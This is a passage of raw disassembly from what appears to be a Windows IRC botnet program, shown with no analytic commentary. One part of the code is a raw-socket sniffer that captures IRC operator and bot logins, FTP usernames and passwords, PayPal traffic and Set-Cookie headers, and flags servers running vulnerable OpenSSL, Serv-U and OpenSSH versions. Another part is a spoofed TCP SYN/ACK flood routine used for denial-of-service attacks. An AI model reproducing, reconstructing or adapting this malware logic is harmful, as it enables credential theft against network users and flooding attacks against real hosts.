push [ebp+var_B4]
call sub_409C75
add esp, 14h
loc_412B94: ; CODE XREF: sub_41289A+2D8�j
lea eax, [ebp+var_2B4]
push eax
call sub_415A3C
pop ecx
jmp loc_412B1C
; ---------------------------------------------------------------------------
loc_412BA6: ; CODE XREF: sub_41289A+20F�j
call ds:dword_4E2F5C ; WSAGetLastError
push eax
push offset dword_44C7F0
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_41EC30
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_412BEC
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409C75
add esp, 14h
loc_412BEC: ; CODE XREF: sub_41289A+330�j
lea eax, [ebp+var_2B4]
push eax
call sub_415A3C
pop ecx
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+var_30]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
sub_41289A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412C10 proc near ; CODE XREF: sub_412F1F+216�p
; sub_412F1F+240�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_4E5D28, eax
mov eax, offset dword_4E5D28
retn
sub_412C10 endp
; =============== S U B R O U T I N E =======================================
sub_412C1F proc near ; CODE XREF: sub_412F1F+2B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aBotSniff ; "Bot sniff"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412C39
loc_412C35: ; CODE XREF: sub_412C1F+29�j
; sub_412C1F+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412C39: ; CODE XREF: sub_412C1F+14�j
push offset a0 ; "#0#"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C35
push offset aPsniff_1 ; "[PSNIFF]:"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C35
push offset aPsniff_2 ; "PSNIFF//"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C35
push offset aJoin_1 ; "JOIN #"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412C81
loc_412C7D: ; CODE XREF: sub_412C1F+71�j
; sub_412C1F+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412C81: ; CODE XREF: sub_412C1F+5C�j
push offset a302_0 ; "302 "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C7D
push offset a366 ; "366 "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C7D
push offset a_login ; ":.login"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C7D
push offset aLogin_1 ; ":!login"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C7D
push offset aLogin_2 ; ":!Login"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C7D
push offset a_login_0 ; ":.Login"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C7D
push offset a_ident ; ":.ident"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C7D
push offset aIdent_0 ; ":!ident"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz loc_412C7D
push offset a_hashin ; ":.hashin"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz loc_412C7D
push offset aHashin ; ":!hashin"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412C1F endp
; =============== S U B R O U T I N E =======================================
sub_412D36 proc near ; CODE XREF: sub_412F1F:loc_413205�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aIrcSniff ; "IRC sniff"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412D50
loc_412D4C: ; CODE XREF: sub_412D36+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412D50: ; CODE XREF: sub_412D36+14�j
push offset a0 ; "#0#"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412D4C
push offset aOper ; "OPER "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412D76
loc_412D72: ; CODE XREF: sub_412D36+4F�j
; sub_412D36+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412D76: ; CODE XREF: sub_412D36+3A�j
push offset aNick_3 ; "NICK "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412D72
push offset aOper_0 ; "oper "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412D72
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412D36 endp
; =============== S U B R O U T I N E =======================================
sub_412DAC proc near ; CODE XREF: sub_412F1F:loc_413231�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aFtpSniff ; "FTP sniff"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412DC6
loc_412DC2: ; CODE XREF: sub_412DAC+29�j
; sub_412DAC+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412DC6: ; CODE XREF: sub_412DAC+14�j
push offset a0 ; "#0#"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412DC2
push offset aNick_2 ; "NICK "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412DC2
push offset a220 ; "220 "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412DFD
loc_412DF9: ; CODE XREF: sub_412DAC+60�j
; sub_412DAC+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412DFD: ; CODE XREF: sub_412DAC+4B�j
push offset a230 ; "230 "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412DF9
push offset aUser_2 ; "USER "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412DF9
push offset aPass_0 ; "PASS "
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412DAC endp
; =============== S U B R O U T I N E =======================================
sub_412E33 proc near ; CODE XREF: sub_412F1F+345�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aHttpSniff ; "HTTP sniff"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412E4D
loc_412E49: ; CODE XREF: sub_412E33+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412E4D: ; CODE XREF: sub_412E33+14�j
push offset a0 ; "#0#"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412E49
push offset aPaypal ; "paypal"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412E73
loc_412E6F: ; CODE XREF: sub_412E33+4F�j
; sub_412E33+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412E73: ; CODE XREF: sub_412E33+3A�j
push offset aPaypal_0 ; "PAYPAL"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412E6F
push offset aPaypal_com ; "PAYPAL.COM"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412E6F
push offset aPaypal_com_0 ; "paypal.com"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412E6F
push offset aSetCookie ; "Set-Cookie:"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412E33 endp
; =============== S U B R O U T I N E =======================================
sub_412EBA proc near ; CODE XREF: sub_412F1F:loc_4132CC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aVulnSniff ; "VULN sniff"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412ED4
loc_412ED0: ; CODE XREF: sub_412EBA+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412ED4: ; CODE XREF: sub_412EBA+14�j
push offset a0 ; "#0#"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412ED0
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_412EFA
loc_412EF6: ; CODE XREF: sub_412EBA+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412EFA: ; CODE XREF: sub_412EBA+3A�j
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412EF6
push offset aOpenssh_2 ; "OpenSSH_2"
push esi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412EBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F1F proc near ; DATA XREF: sub_401C87+4254�o
var_113B8 = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
var_113A4 = dword ptr -113A4h
var_1138C = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
var_3B8 = byte ptr -3B8h
var_3B7 = byte ptr -3B7h
var_2B8 = byte ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 113B8h
call sub_41EF80
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+var_B8]
rep movsd
xor esi, esi
push 3Fh
inc esi
xor ebx, ebx
mov [eax+90h], esi
pop ecx
loc_412F4D: ; DATA XREF: _2:off_4516C0�o
; _2:off_4516C4�o
xor eax, eax
lea edi, [ebp+var_3B7]
mov [ebp+var_3B8], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_3B8]
mov [ebp+var_20], 2
push eax
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call ds:dword_4E2FDC ; gethostname
lea eax, [ebp+var_3B8]
push eax
call ds:dword_4E304C ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_8]
push eax
call sub_41FBF0
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx
push 3
push 2
call ds:dword_4E3048 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_412FC5
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_412FC5: ; CODE XREF: sub_412F1F+9B�j
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call ds:dword_4E2FF4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_41303B
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push offset unk_44C990
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_413017
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409C75
add esp, 14h
loc_413017: ; CODE XREF: sub_412F1F+D6�j
lea eax, [ebp+var_2B8]
push eax
call sub_415A3C
pop ecx
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+var_34]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_41303B: ; CODE XREF: sub_412F1F+B6�j
push ebx
lea eax, [ebp+var_24]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_C], esi
call ds:dword_4E2F74 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4130C1
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push offset unk_44C9BC
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_41309D
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409C75
add esp, 14h
loc_41309D: ; CODE XREF: sub_412F1F+15C�j
lea eax, [ebp+var_2B8]
push eax
call sub_415A3C
pop ecx
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+var_34]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4130C1: ; CODE XREF: sub_412F1F+13C�j
mov esi, 200h
loc_4130C6: ; CODE XREF: sub_412F1F+1D6�j
; sub_412F1F+1FF�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_113B8]
push edi
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_113B8]
push ebx
push edi
push eax
push [ebp+var_10]
call ds:dword_4E2FE0 ; recv
cmp [ebp+var_113AF], 6
jnz short loc_4130C6
push [ebp+var_113A4]
call ds:dword_4F5500 ; htons
push [ebp+var_113A4+2]
movzx edi, ax
mov [ebp+var_4], edi
call ds:dword_4F5500 ; htons
movzx eax, ax
cmp edi, 6Eh
mov [ebp+arg_0], eax
jz short loc_4130C6
cmp edi, 19h
jz short loc_4130C6
cmp eax, 6Eh
jz short loc_4130C6
cmp eax, 19h
jz short loc_4130C6
push [ebp+var_113AC]
call sub_412C10
mov edi, ds:dword_4F5504
add esp, 4
push dword ptr [eax]
call edi ; inet_ntoa
push eax
lea eax, [ebp+var_13B8]
push offset aS_27 ; "%s"
push eax
call sub_41EA60
push [ebp+var_113A8]
call sub_412C10
add esp, 10h
push dword ptr [eax]
call edi ; inet_ntoa
push eax
lea eax, [ebp+var_BB8]
push offset aS_28 ; "%s"
push eax
call sub_41EA60
lea eax, [ebp+var_1138C]
xor edi, edi
push eax
call sub_41BC70
add esp, 10h
test eax, eax
jle short loc_4131BB
loc_413192: ; CODE XREF: sub_412F1F+29A�j
lea eax, [ebp+edi+var_1138C]
cmp byte ptr [eax], 0Dh
jnz short loc_4131A1
mov byte ptr [eax], 20h
loc_4131A1: ; CODE XREF: sub_412F1F+27D�j
cmp byte ptr [eax], 0Ah
jnz short loc_4131A9
mov byte ptr [eax], 20h
loc_4131A9: ; CODE XREF: sub_412F1F+285�j
lea eax, [ebp+var_1138C]
inc edi
push eax
call sub_41BC70
cmp edi, eax
pop ecx
jl short loc_413192
loc_4131BB: ; CODE XREF: sub_412F1F+271�j
cmp [ebp+var_4], 50h
jz loc_41325D
cmp [ebp+arg_0], 50h
jz loc_41325D
lea eax, [ebp+var_1138C]
push eax
call sub_412C1F
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_413205
push [ebp+arg_0]
lea eax, [ebp+var_BB8]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push offset unk_44C9F4
jmp loc_41328E
; ---------------------------------------------------------------------------
loc_413205: ; CODE XREF: sub_412F1F+2C6�j
call sub_412D36
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_413231
push [ebp+arg_0]
lea eax, [ebp+var_BB8]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push offset unk_44CA28
jmp short loc_41328E
; ---------------------------------------------------------------------------
loc_413231: ; CODE XREF: sub_412F1F+2F5�j
call sub_412DAC
test al, al
pop ecx
jz short loc_41325D
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push offset unk_44CA5C
jmp short loc_41328E
; ---------------------------------------------------------------------------
loc_41325D: ; CODE XREF: sub_412F1F+2A0�j
; sub_412F1F+2AA�j ...
lea eax, [ebp+var_1138C]
push eax
call sub_412E33
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_4132CC
push [ebp+arg_0]
lea eax, [ebp+var_BB8]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push offset unk_44CA90
loc_41328E: ; CODE XREF: sub_412F1F+2E1�j
; sub_412F1F+310�j ...
lea eax, [ebp+var_2B8]
push esi
push eax
call sub_41EC30
add esp, 20h
cmp [ebp+var_2C], ebx
jnz loc_4130C6
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409C75
add esp, 14h
jmp loc_4130C6
; ---------------------------------------------------------------------------
loc_4132CC: ; CODE XREF: sub_412F1F+354�j
call sub_412EBA
test al, al
pop ecx
jz loc_4130C6
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push offset unk_44CAC8
jmp short loc_41328E
sub_412F1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4132FC proc near ; DATA XREF: sub_401C87+65ED�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4136E4
push eax
lea eax, [ebp+var_494]
push offset unk_44CB00
push eax
call sub_41EA60
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_41338C
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_409C75
add esp, 14h
loc_41338C: ; CODE XREF: sub_4132FC+6E�j
lea eax, [ebp+var_494]
push eax
call sub_415A3C
push [ebp+var_290]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_4132FC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4133AE proc near ; CODE XREF: sub_4136E4+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_4E2F38 ; WSAStartup
test eax, eax
jz short loc_4133EE
xor eax, eax
jmp loc_4136B7
; ---------------------------------------------------------------------------
loc_4133EE: ; CODE XREF: sub_4133AE+37�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_4E306C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4136AF
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call ds:dword_4E2FA8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4136A5
push [ebp+arg_C]
mov [ebp+var_58], 2
call ds:dword_4E2FC8 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call ds:dword_4E2FC8 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call ds:dword_4E2FC8 ; htons
mov [ebp+var_12], ax
call sub_41EB70
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_4E2FC8 ; htons
push 12345678h
mov [ebp+var_14], ax
call ds:dword_4E2FC4 ; htonl
push offset aDdos_syn_0 ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4134BE
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_413512
; ---------------------------------------------------------------------------
loc_4134BE: ; CODE XREF: sub_4133AE+105�j
push offset aDdos_ack_0 ; "ddos.ack"
push [ebp+arg_8]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4134DA
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_413512
; ---------------------------------------------------------------------------
loc_4134DA: ; CODE XREF: sub_4133AE+121�j
push offset aDdos_random_0 ; "ddos.random"
push [ebp+arg_8]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_413512
call sub_41EB70
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_41EB70
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_413512: ; CODE XREF: sub_4133AE+10E�j
; sub_4133AE+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call ds:dword_4E2FC8 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call ds:dword_4F540C ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_4F5408 ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_421180
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_413560: ; CODE XREF: sub_4133AE+2E2�j
; sub_4133AE+2EE�j
mov [ebp+var_4], bx
call sub_41EB70
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_4E2FC8 ; htons
mov [ebp+var_14], ax
call sub_41EB70
mov edi, eax
shl edi, 10h
call sub_41EB70
or edi, eax
push edi
call ds:dword_4E2FC8 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_4E2FC4 ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_4E2FC8 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41FBF0
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_41FBF0
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AF06
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41FBF0
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41FBF0
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_41E4B0
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AF06
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41FBF0
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call ds:dword_4E302C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4136BB
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_4F5408 ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4136A2
jl loc_413560
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jb loc_413560
loc_4136A2: ; CODE XREF: sub_4133AE+2E0�j
mov ebx, [ebp+arg_8]
loc_4136A5: ; CODE XREF: sub_4133AE+78�j
; sub_4133AE+334�j
push [ebp+var_20]
call ds:dword_4E3060 ; closesocket
pop esi
loc_4136AF: ; CODE XREF: sub_4133AE+5B�j
call ds:dword_4E2F20 ; WSACleanup
mov eax, ebx
loc_4136B7: ; CODE XREF: sub_4133AE+3B�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4136BB: ; CODE XREF: sub_4133AE+2CB�j
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset dword_44CB4C
push eax
call sub_41EA60
lea eax, [ebp+var_F4]
push eax
call sub_415A3C
add esp, 10h
jmp short loc_4136A5
sub_4133AE endp
; =============== S U B R O U T I N E =======================================
sub_4136E4 proc near ; CODE XREF: sub_4132FC+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AD91
push [esp+10h+arg_4]
mov esi, eax
call sub_41E710
push [esp+14h+arg_C]
mov ebx, eax
call sub_41E710
mov edi, eax
call sub_41EB70
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4133AE
add esp, 20h
test eax, eax
jnz short loc_413731
inc eax
loc_413731: ; CODE XREF: sub_4136E4+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4136E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413740 proc near ; DATA XREF: sub_401C87+67DD�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
push 0FFh
inc ebx
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call ds:dword_4E3048 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4137DB
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_44CB68
push eax
call sub_41EA60
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_4137BE
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409C75
add esp, 14h
loc_4137BE: ; CODE XREF: sub_413740+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_415A3C
push [ebp+var_38]
call sub_40B9A7
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_4137DB: ; CODE XREF: sub_413740+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call ds:dword_4E2FA8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_413852
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
